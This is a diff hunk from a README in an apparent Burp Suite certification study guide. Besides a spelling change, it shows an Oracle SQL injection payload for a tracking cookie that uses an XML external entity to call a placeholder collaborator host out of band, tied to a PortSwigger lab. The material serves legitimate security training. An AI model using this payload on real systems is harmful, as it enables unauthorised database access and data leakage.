botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 >The SQL payload above can also be used to extract the Administrator password for the this [PortSwigger Lab: Blind SQL injection with conditional errors](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors) challenge.

->Below SQL payload only makes call to collaboration server but no data is exfiltrated.
+>Below SQL payload only makes call to collaboration server but no data is ex-filtrated.

 ```sql
 TrackingId=xxx'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//COLLABORATOR.NET/">+%25remote%3b]>'),'/l')+FROM+dual--